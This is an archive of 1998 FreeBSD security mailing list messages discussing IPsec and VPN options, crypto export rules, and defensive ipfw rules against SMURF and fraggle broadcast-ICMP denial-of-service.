I have yet to try it out. I also agree that the lack of documentation is a huge drawback. There is no continuity between segments. :( What do you recommend for FreeBSD then? SKIP, ssh/ppp, ??? Kevin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 16:10:32 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA28860 for freebsd-security-outgoing; Wed, 27 May 1998 16:10:32 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from adk.gr (COREDUMP.CIS.UPENN.EDU [158.130.6.141]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA28743 for ; Wed, 27 May 1998 16:10:01 -0700 (PDT) (envelope-from angelos@dsl.cis.upenn.edu) Received: from dsl.cis.upenn.edu (localhost [127.0.0.1]) by adk.gr (8.8.8/8.8.5) with ESMTP id TAA15065; Wed, 27 May 1998 19:09:26 -0400 (EDT) Message-Id: <199805272309.TAA15065@adk.gr> To: Atipa Cc: Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: SKIP problems In-reply-to: Your message of "Wed, 27 May 1998 16:01:31 MDT." Date: Wed, 27 May 1998 19:09:26 -0400 From: "Angelos D. Keromytis" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- To: Atipa Subject: Re: SKIP problems Cc: Open Systems Networking , Date: 05/27/98, 19:09:25 In message , Atipa writes: > >I agree, but the word "trivial" _was_ used. Poetic license and all that. >I have yet to try it out. I use it all the time, but then I'm one of the coders. Expect a FreeBSD port in the next few weeks (unfortunately available only to US citizens). >I also agree that the lack of documentation is a huge drawback. There is no >continuity between segments. :( Yes, but no one likes writing docs (never mind good ones) :-) >What do you recommend for FreeBSD then? SKIP, ssh/ppp, ??? Well, wait for the port.
I don't like the SKIP design and philosophy (except for multicast communications), and I think ssh/ppp is a horrible hack. - -Angelos -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBNWydJb0pBjh2h1kFAQFX1gP+LZcT84NgVoJsoGYcvFUGslgupTW+0aEd zhcT62o0xXVF36efI8shBRHqSDxBAAKFs3S7pwdhxL8fw05Xg/CzmGbBKmzFU51j NAU28GBk66zaa1jIaCjIVQjpukF1e2TrdduwzaMLX18YaXEI8qoa/TWgxlTvcrbF lC0v57O0E/E= =SUXt -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 16:42:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA05033 for freebsd-security-outgoing; Wed, 27 May 1998 16:42:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from granite.sentex.net (granite.sentex.ca [199.212.134.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA04647 for ; Wed, 27 May 1998 16:40:13 -0700 (PDT) (envelope-from mike@sentex.net) Received: from ospf-mdt.sentex.net (ospf-mdt.sentex.net [205.211.164.81]) by granite.sentex.net (8.8.6/8.6.9) with SMTP id TAA18312; Wed, 27 May 1998 19:38:27 -0400 (EDT) From: mike@sentex.net (Mike Tancsa) To: cschuber@uumail.gov.bc.ca Cc: freebsd-security@FreeBSD.ORG Subject: Re: SMURF in 2.2.5 Date: Wed, 27 May 1998 23:41:40 GMT Message-ID: <356ca296.243683658@mail.sentex.net> References: <199805271623.JAA05578@passer.osg.gov.bc.ca> In-Reply-To: <199805271623.JAA05578@passer.osg.gov.bc.ca> X-Mailer: Forte Agent .99e/32.227 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Wed, 27 May 1998 09:22:50 -0700, in sentex.lists.freebsd.misc you wrote: >What about ipfw? For example, where 123.123.123.0 is your network >address, > >ipfw add deny icmp from 123.123.123.0 to any >ipfw add deny icmp from 123.123.123.255 to any You dont really want to disable all ICMP traffic as it will break some things... 
If you want to prevent pings from flowing through your FreeBSD box, you can specify something like ipfw add 4000 deny log icmp from any to any icmptype 0,8 to stop echo and echo reply... Also, this does nothing to prevent you from being SMURF attacked.. It only would help prevent you from being used as a source. Think about it, if your network is something like UPSTREAM --------DS1 link ---------your gateway The flood of packets will traverse your DS1 only to be stopped at "your gateway".. bye bye DS1 bandwidth... ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 16:59:33 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA09121 for freebsd-security-outgoing; Wed, 27 May 1998 16:59:33 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA09004 for ; Wed, 27 May 1998 16:58:47 -0700 (PDT) (envelope-from root@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id QAA10311; Wed, 27 May 1998 16:58:31 -0700 (PDT) Message-Id: <199805272358.QAA10311@implode.root.com> To: andrew@squiz.co.nz (Andrew McNaughton) cc: "J.A. Terranson" , "'FreeBSD Security'" Subject: Re: Possible DoS opportunity via ping implementation error? In-reply-to: Your message of "Wed, 27 May 1998 17:37:46 +1200." From: David Greenman Reply-To: dg@root.com Date: Wed, 27 May 1998 16:58:31 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk >At 3:05 PM 27/5/98, J.A. Terranson wrote: >>I had a very interesting day today! I found out that FBSD (2.2.5R) >>machines will >>always respond to a broadcasted echo request. For example: > >This contradicts the CERT Advisory below which states that FreeBSD does not >have the problem. 
> >Either the CERT report is wrong, a problem has been introduced since, or >it's specific to the way you've set up your boxes. > >I'd like to know which. ... >>FreeBSD, Inc. >>============= >>In FreeBSD 2.2.5 and up, the tcp/ip stack does not respond to icmp >>echo requests destined to broadcast and multicast addresses by default. This >>behaviour can be changed via the sysctl command via >>mib net.inet.icmp.bmcastecho. The CERT advisory is wrong. FreeBSD has always responded to broadcast ICMP echo requests by default. Further, the option mentioned to disable them was broken in 2.2.x and -current until just yesterday. -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 18:15:52 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA23962 for freebsd-security-outgoing; Wed, 27 May 1998 18:15:52 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from wraith.cs.uow.edu.au (root@wraith.cs.uow.edu.au [130.130.64.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id SAA23916 for ; Wed, 27 May 1998 18:15:32 -0700 (PDT) (envelope-from ncb05@uow.edu.au) Received: from banshee.cs.uow.edu.au (ncb05@banshee.cs.uow.edu.au [130.130.188.1]) by wraith.cs.uow.edu.au (8.9.0.Beta5/8.9.0.Beta5) with SMTP id LAA25608 for ; Thu, 28 May 1998 11:15:22 +1000 (EST) Date: Thu, 28 May 1998 11:15:20 +1000 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: freebsd-security@FreeBSD.ORG Subject: Photuris Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Is there any work being done to port Photuris over to FreeBSD? If so, is non-US based so I don't have to worry about EAR? 
:) For those who are unaware what photuris is, from the readme: This is an implementation of the Photuris keymanagement protocol according to the drafts: draft-simpson-photuris-18.txt draft-simpson-photuris-schemes-04.txt It can be obtained from http://www.physnet.uni-hamburg.de/provos/photuris/ Nick -- Email: ncb05@uow.edu.au - DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A http://rabble.uow.edu.au/~nick - public key available on request. Nicholas Brawn - Computer Science Undergraduate, University of Wollongong. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 19:19:10 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA03918 for freebsd-security-outgoing; Wed, 27 May 1998 19:19:10 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.atipa.com (altrox.atipa.com [208.128.22.34]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id TAA03877 for ; Wed, 27 May 1998 19:18:46 -0700 (PDT) (envelope-from freebsd@atipa.com) Received: (qmail 28083 invoked by uid 1017); 28 May 1998 01:16:03 -0000 Date: Wed, 27 May 1998 19:16:03 -0600 (MDT) From: Atipa To: angelos@dsl.cis.upenn.edu, jkh@time.cdrom.com cc: Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: FreeBSD Tunneling In-Reply-To: <199805272309.TAA15065@adk.gr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk [ ... w.r.t Photuris/IPsec/vpn ... ] Angelos writes: > I use it all the time, but then I'm one of the coders. Expect a > FreeBSD port in the next few weeks (unfortunately available only to US > citizens). Well, I think those last bits to the FreeBSD code should be completed in South Africa, and distributed from there :) Jordan mentioned to me that Walnut Creek is in some sort of crypto-law-exempt region or something, and FreeBSD can use full-strength crypto. 
Jordan, care to explain? This would be a big loss to FreeBSD if this technology goes non-exportable! > >I also agree that the lack of documentation is a huge drawback. There is no > >continuity between segments. :( > Yes, but noone likes writing docs (never mind good ones) :-) Well, if you help me figure it out, I'll write the docs. I'll wait for the FreeBSD port (no OpenBSD machines in use now, and I like FreeBSD better!), but I'd be happy to contribute. > >What do you recommend for FreeBSD then? SKIP, ssh/ppp, ??? > > Well, wait for the port. I don't like the SKIP design and philosophy > (except for multicast communications), and I think ssh/ppp is a > horrible hack. Agreed on both accounts. Keep in touch w/ me if you want testers, etc. Kevin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 20:00:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12059 for freebsd-security-outgoing; Wed, 27 May 1998 20:00:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11841 for ; Wed, 27 May 1998 20:00:20 -0700 (PDT) (envelope-from opsys@mail.webspan.net) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id WAA26477; Wed, 27 May 1998 22:54:05 -0400 (EDT) Date: Wed, 27 May 1998 22:59:44 -0400 (EDT) From: Open Systems Networking X-Sender: opsys@orion.webspan.net To: Atipa cc: angelos@dsl.cis.upenn.edu, jkh@time.cdrom.com, freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Wed, 27 May 1998, Atipa wrote: > Well, I think those last bits to the FreeBSD code should be completed in > South 
Africa, and distributed from there :) I second this! > Jordan mentioned to me that Walnut Creek is in some sort of > crypto-law-exempt region or something, and FreeBSD can use full-strength > crypto. Jordan, care to explain? This would be a big loss to FreeBSD if > this technology goes non-exportable! I was not aware of that hmm. > Well, if you help me figure it out, I'll write the docs. I'll wait for the > FreeBSD port (no OpenBSD machines in use now, and I like FreeBSD better!), > but I'd be happy to contribute. I was going to write a section in the handbook for SKIP once I got it working but I'm quite convinced SKIP sucks, and while no one likes writing docs I have seen more documentation on "undocumented" kernel options than SKIP. I'm sure once it's working it is probably nice, but I think the implementation must be piss poor if so many people are finding it impossible to get configured. > Agreed on both accounts. Keep in touch w/ me if you want testers, etc. I'd be happy to test it as well. Chris -- "I don't do favors, I accumulate debts" ===================================| Open Systems Networking And Consulting. FreeBSD 2.2.6 is available now! | Phone: 316-326-6800 -----------------------------------| 1402 N. Washington, Wellington, KS-67152 FreeBSD: The power to serve!
| E-Mail: opsys@open-systems.net http://www.freebsd.org | Consulting-Network Engineering-Security ===================================| http://open-systems.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed May 27 20:01:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA12080 for freebsd-security-outgoing; Wed, 27 May 1998 20:01:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (root@time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA11965 for ; Wed, 27 May 1998 20:00:42 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id UAA08173; Wed, 27 May 1998 20:00:51 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: Atipa cc: angelos@dsl.cis.upenn.edu, Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Tunneling In-reply-to: Your message of "Wed, 27 May 1998 19:16:03 MDT." Date: Wed, 27 May 1998 20:00:51 -0700 Message-ID: <8169.896324451@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > Jordan mentioned to me that Walnut Creek is in some sort of > crypto-law-exempt region or something, and FreeBSD can use full-strength > crypto. Jordan, care to explain?
This would be a big loss to FreeBSD if
> this technology goes non-exportable!

I wouldn't worry too much about this.

- Jordan

From owner-freebsd-security Wed May 27 20:07:39 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA13544 for freebsd-security-outgoing; Wed, 27 May 1998 20:07:39 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mail.atipa.com (altrox.atipa.com [208.128.22.34]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id UAA13202 for ; Wed, 27 May 1998 20:06:20 -0700 (PDT) (envelope-from freebsd@atipa.com)
Received: (qmail 28325 invoked by uid 1017); 28 May 1998 02:03:32 -0000
Date: Wed, 27 May 1998 20:03:32 -0600 (MDT)
From: Atipa
To: "Jordan K. Hubbard"
cc: angelos@dsl.cis.upenn.edu, Open Systems Networking , freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Tunneling
In-Reply-To: <8169.896324451@time.cdrom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

> > Jordan mentioned to me that Walnut Creek is in some sort of
> > crypto-law-exempt region or something, and FreeBSD can use full-strength
> > crypto. Jordan, care to explain? This would be a big loss to FreeBSD if
> > this technology goes non-exportable!
>
> I wouldn't worry too much about this.

If you have an authoritative coder saying "this will not be available
outside the US", I would worry, or explain to him/her why one should not.

I myself would like to know why we need not worry.
Kevin

From owner-freebsd-security Wed May 27 21:12:26 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id VAA22560 for freebsd-security-outgoing; Wed, 27 May 1998 21:12:26 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from passer.osg.gov.bc.ca (0@passer.osg.gov.bc.ca [142.32.110.29]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id VAA22493 for ; Wed, 27 May 1998 21:12:13 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca)
Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.8.8/8.6.10) id VAA03184; Wed, 27 May 1998 21:12:10 -0700 (PDT)
Received: from cschuber.net.gov.bc.ca(142.31.240.113), claiming to be "cwsys.cwsent.com" via SMTP by passer.osg.gov.bc.ca, id smtpdaakspa; Wed May 27 21:11:59 1998
Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.0/8.6.10) id VAA07122; Wed, 27 May 1998 21:11:49 -0700 (PDT)
Message-Id: <199805280411.VAA07122@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdWQ7110; Wed May 27 21:11:40 1998
X-Mailer: exmh version 2.0.2 2/24/98
Reply-to: Cy Schubert - ITSD Open Systems Group
From: Cy Schubert - ITSD Open Systems Group
X-Sender: cy
To: Cy Schubert - ITSD Open Systems Group
cc: Bart Smit , "J.A. Terranson" , "'FreeBSD Security'"
Subject: Re: SMURF in 2.2.5
In-reply-to: Your message of "Wed, 27 May 1998 09:22:50 PDT." <199805271623.JAA05578@passer.osg.gov.bc.ca>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 27 May 1998 21:11:39 -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

> >
> > On Wed, 27 May 1998, J.A. Terranson wrote:
> >
> > > I will not report this to bugtraq until you guys tell me there's
> > > a patch...
> >
> > Well, sysctl -w net.inet.icmp.bmcastecho=0 does not help, contrary to
> > what you'd expect from the advisory...
>
> What about ipfw? For example, where 123.123.123.0 is your network
> address,
>
> ipfw add deny icmp from 123.123.123.0 to any
> ipfw add deny icmp from 123.123.123.255 to any

It looks like I've been a little dyslexic in my previous post. This should
have been,

    ipfw add deny icmp from any to 123.123.123.255

To circumvent the fraggle (UDP) attack,

    ipfw add deny udp from any to 123.123.123.255

This has the added benefit of denying not only broadcast icmp (and udp)
packets that are destined in but also broadcast icmp (and udp) packets
destined out as well.

Regards,                       Phone:  (250)387-8437
Cy Schubert                      Fax:  (250)387-5766
Open Systems Group          Internet:  cschuber@uumail.gov.bc.ca
ITSD                                   Cy.Schubert@gems8.gov.bc.ca
Government of BC

From owner-freebsd-security Thu May 28 01:32:34 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA29588 for freebsd-security-outgoing; Thu, 28 May 1998 01:32:34 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from citadel.cdsec.com (citadel.cdsec.com [192.96.22.18]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA29541 for ; Thu, 28 May 1998 01:32:22 -0700 (PDT) (envelope-from ian@cdsec.com)
Received: (from nobody@localhost) by citadel.cdsec.com (8.8.5/8.6.9) id KAA25274; Thu, 28 May 1998 10:38:53 +0200 (SAT)
Received: by citadel via recvmail id 25231; Thu May 28 10:38:23 1998
From: Ian Cooper
Message-Id: <199805280830.KAA24639@cdsec.com>
Subject: Re: FreeBSD Tunneling
To: freebsd@atipa.com (Atipa)
Date: Thu, 28 May 1998 10:30:35 +0200 (SAT)
Cc: freebsd-security@FreeBSD.ORG, opsys@mail.webspan.net
In-Reply-To: from "Atipa" at May 27, 98 08:03:32 pm
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

>
> On Wed, 27 May 1998, Atipa wrote:
>
> > Well, I think those last bits to the FreeBSD code should be completed in
> >
South Africa, and distributed from there :)
>
> I second this!

We're presently debugging and extending the WIDE IPSEC implementation
to do tunnel mode, and this IS being done in South Africa :)

The WIDE implementation, IMHO is a pretty clean one, and since it
is inherently a FreeBSD implementation rather than a port, I'd
suggest that it be considered as a strong candidate for the "official"
implementation.

We also have plans for an ISAKMP implementation. If others volunteer
to do some of the non-crypto ISAKMP stuff, then we can do the crypto
part and that would speed up the availability of isakmp.

Ian

>
> > Jordan mentioned to me that Walnut Creek is in some sort of
> > crypto-law-exempt region or something, and FreeBSD can use full-strength
> > crypto. Jordan, care to explain? This would be a big loss to FreeBSD if
> > this technology goes non-exportable!
>
> I was not aware of that hmm.
>
> > Well, if you help me figure it out, I'll write the docs. I'll wait for the
> > FreeBSD port (no OpenBSD machines in use now, and I like FreeBSD better!),
> > but I'd be happy to contribute.
>
> I was going to write a section in the handbook for SKIP once I got it
> working but I'm quite convinced SKIP sucks, and while no one likes writing
> docs I have seen more documentation on "undocumented" kernel options
> than SKIP. I'm sure once it's working it is probably nice, but I think the
> implementation must be piss poor if so many people are finding it
> impossible to get configured.
>
> > Agreed on both accounts. Keep in touch w/ me if you want testers, etc.
>
> I'd be happy to test it as well.
>
> Chris
>
> --
> "I don't do favors, I accumulate debts"
>
> ===================================| Open Systems Networking And Consulting.
> FreeBSD 2.2.6 is available now!    | Phone: 316-326-6800
> -----------------------------------| 1402 N. Washington, Wellington, KS-67152
> FreeBSD: The power to serve!
| E-Mail: opsys@open-systems.net
> http://www.freebsd.org             | Consulting-Network Engineering-Security
> ===================================| http://open-systems.net
>

--
Ian Cooper (ian@cdsec.com)             Tel: +27 21 23-6065
Citadel Data Security                  Fax: +27 21 24-3656
Citadel Firewall, Citadel VPN Router   Unit 3, 46 Orange Street
http://www.cdsec.com                   Cape Town, South Africa

From owner-freebsd-security Thu May 28 01:48:51 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA03369 for freebsd-security-outgoing; Thu, 28 May 1998 01:48:51 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA03325 for ; Thu, 28 May 1998 01:48:38 -0700 (PDT) (envelope-from opsys@mail.webspan.net)
Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with SMTP id EAA17083; Thu, 28 May 1998 04:42:48 -0400 (EDT)
Date: Thu, 28 May 1998 04:48:27 -0400 (EDT)
From: Open Systems Networking
X-Sender: opsys@orion.webspan.net
To: Ian Cooper
cc: Atipa , freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Tunneling
In-Reply-To:
<199805280830.KAA24639@cdsec.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

On Thu, 28 May 1998, Ian Cooper wrote:

> We're presently debugging and extending the WIDE IPSEC implementation
> to do tunnel mode, and this IS being done in South Africa :)

WooWoo!! All I ask is that it works and works as the instructions say :)
SKIP has left a bitter taste in my mouth now when I hear the word "tunnel"
or "vpn" :)

> The WIDE implementation, IMHO is a pretty clean one, and since it
> is inherently a FreeBSD implementation rather than a port, I'd
> suggest that it be considered as a strong candidate for the "official"
> implementation.

Let the best Stack win :)

> We also have plans for an ISAKMP implementation. If others volunteer
> to do some of the non-crypto ISAKMP stuff, then we can do the crypto
> part and that would speed up the availability of isakmp.

> http://www.cdsec.com                   Cape Town, South Africa

Oh and BTW, I just checked out your company page. WHY is your firewall not
listed under software in the commercial vendors section???

I thought AKER was the only FreeBSD firewall solution (commercial) but I
can't use them because they don't have an English version, and that wouldn't
go over too well with my clients :) They would be lost.
This NEEDS to be listed in the commercial vendors section under software.
I'm adding it to my company pages soon as a firewall solution.

I will use your solution in my next big project in a few months.
BTW I didn't see this listed which probably means no, but do you have an X
GUI in addition to the windows GUI for configuring it?

Chris

--
"I don't do favors, I accumulate debts"

===================================| Open Systems Networking And Consulting.
FreeBSD 2.2.6 is available now!    | Phone: 316-326-6800
-----------------------------------| 1402 N. Washington, Wellington, KS-67152
FreeBSD: The power to serve!
| E-Mail: opsys@open-systems.net
http://www.freebsd.org             | Consulting-Network Engineering-Security
===================================| http://open-systems.net

From owner-freebsd-security Thu May 28 02:05:14 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA04839 for freebsd-security-outgoing; Thu, 28 May 1998 02:05:14 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from citadel.cdsec.com (citadel.cdsec.com [192.96.22.18]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA04699 for ; Thu, 28 May 1998 02:03:00 -0700 (PDT) (envelope-from ian@cdsec.com)
Received: (from nobody@localhost) by citadel.cdsec.com (8.8.5/8.6.9) id LAA26554; Thu, 28 May 1998 11:09:53 +0200 (SAT)
Received: by citadel via recvmail id 26509; Thu May 28 11:08:54 1998
From: Ian Cooper
Message-Id: <199805280901.LAA26511@cdsec.com>
Subject: Re: FreeBSD Tunneling
To: opsys@mail.webspan.net (Open Systems Networking)
Date: Thu, 28 May 1998 11:01:05 +0200 (SAT)
Cc: freebsd@atipa.com, freebsd-security@FreeBSD.ORG
In-Reply-To: from "Open Systems Networking" at May 28, 98 04:48:27 am
X-Mailer: ELM [version 2.4 PL24]
Content-Type: text
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

>
> On Thu, 28 May 1998, Ian Cooper wrote:
>
> > We're presently debugging and extending the WIDE IPSEC implementation
> > to do tunnel
mode, and this IS being done in South Africa :)
>
> WooWoo!! All I ask is that it works and works as the instructions say :)
> SKIP has left a bitter taste in my mouth now when I hear the word "tunnel"
> or "vpn" :)
>
> > The WIDE implementation, IMHO is a pretty clean one, and since it
> > is inherently a FreeBSD implementation rather than a port, I'd
> > suggest that it be considered as a strong candidate for the "official"
> > implementation.
>
> Let the best Stack win :)
>
> > We also have plans for an ISAKMP implementation. If others volunteer
> > to do some of the non-crypto ISAKMP stuff, then we can do the crypto
> > part and that would speed up the availability of isakmp.
>
> > http://www.cdsec.com                   Cape Town, South Africa
>
> Oh and BTW, I just checked out your company page. WHY is your firewall not
> listed under software in the commercial vendors section???

Ooops - nasty omission there on our part :( I think we should sort this
out asap.

>
> I thought AKER was the only FreeBSD firewall solution (commercial) but I
> can't use them because they don't have an English version, and that wouldn't
> go over too well with my clients :) They would be lost.
> This NEEDS to be listed in the commercial vendors section under software.
> I'm adding it to my company pages soon as a firewall solution.

Tx - obliged...

>
> I will use your solution in my next big project in a few months.
> BTW I didn't see this listed which probably means no, but do you have an X
> GUI in addition to the windows GUI for configuring it?

Nope - no X config. We think X on a firewall is a bad idea. There is a
text mode interface which is a real no-brainer to use (function keys,
tabbing between data fields, etc.). The manual is online on our web pages,
and there should be some screen shots on the man pages.

>
> Chris
>
> --
> "I don't do favors, I accumulate debts"
>
> ===================================| Open Systems Networking And Consulting.
> FreeBSD 2.2.6 is available now!
| Phone: 316-326-6800
> -----------------------------------| 1402 N. Washington, Wellington, KS-67152
> FreeBSD: The power to serve!       | E-Mail: opsys@open-systems.net
> http://www.freebsd.org             | Consulting-Network Engineering-Security
> ===================================| http://open-systems.net
>

--
Ian Cooper (ian@cdsec.com)             Tel: +27 21 23-6065
Citadel Data Security                  Fax: +27 21 24-3656
Citadel Firewall, Citadel VPN Router   Unit 3, 46 Orange Street
http://www.cdsec.com                   Cape Town, South Africa

From owner-freebsd-security Thu May 28 07:18:54 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA20487 for freebsd-security-outgoing; Thu, 28 May 1998 07:18:54 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from chudich.co.rmit.edu.au (chudich.co.rmit.EDU.AU [131.170.32.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA20437 for ; Thu, 28 May 1998 07:18:44 -0700 (PDT) (envelope-from s9507886@tuan.cse.rmit.EDU.AU)
Received: from dropbear.cse.rmit.EDU.AU (s9507886@dropbear.cse.rmit.EDU.AU [131.170.118.20]) by chudich.co.rmit.edu.au (8.8.8/8.8.8) with ESMTP id AAA01821; Fri, 29 May 1998 00:18:43 +1000 (EST)
Received: (s9507886@localhost) by dropbear.cse.rmit.EDU.AU (8.8.5/8.6.12) id AAA08628; Fri, 29 May 1998 00:14:44 +1000 (EST)
Date: Fri, 29 May 1998 00:14:44 +1000
(EST)
Message-Id: <199805281414.AAA08628@dropbear.cse.rmit.EDU.AU>
From: Tony Alexander Frank
To: andrew@squiz.co.nz
CC: sysadmin@mfn.org, freebsd-security@FreeBSD.ORG
In-reply-to: (andrew@squiz.co.nz)
Subject: Re: Possible DoS opportunity via ping implementation error?
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk

Hi,

> >I had a very interesting day today! I found out that FBSD (2.2.5R)
> >machines will
> >always respond to a broadcasted echo request. For example:
> This contradicts the CERT Advisory below which states that FreeBSD does not
> have the problem.
>
> Either the CERT report is wrong, a problem has been introduced since, or
> it's specific to the way you've set up your boxes.
>
> I'd like to know which.

Well, this occurs on my 2.2.5-RELEASE and 2.2.6-RELEASE machines here.
Nothing fancy done to either box, the install was straight off the Walnut
Creek 2.2.5 disc set, and the 2.2.6 was done over the net.
Both have default values in regards to TCP/IP and just about everything else.

As such, I would tend to suggest that while the CERT report might be
accurate, by default this 'feature' is enabled...

> >FreeBSD, Inc.
> >=============
> >In FreeBSD 2.2.5 and up, the tcp/ip stack does not respond to icmp
> >echo requests destined to broadcast and multicast addresses by default. This
> >behaviour can be changed via the sysctl command via
> >mib net.inet.icmp.bmcastecho.

ivanova$ sysctl net.inet.icmp.bmcastecho
net.inet.icmp.bmcastecho: 1
ivanova$ uname -r
2.2.5-RELEASE
ivanova$

Hope it helps?
Regards,

Tony Frank

From owner-freebsd-security Thu May 28 08:22:12 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA28372 for freebsd-security-outgoing; Thu, 28 May 1998 08:22:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
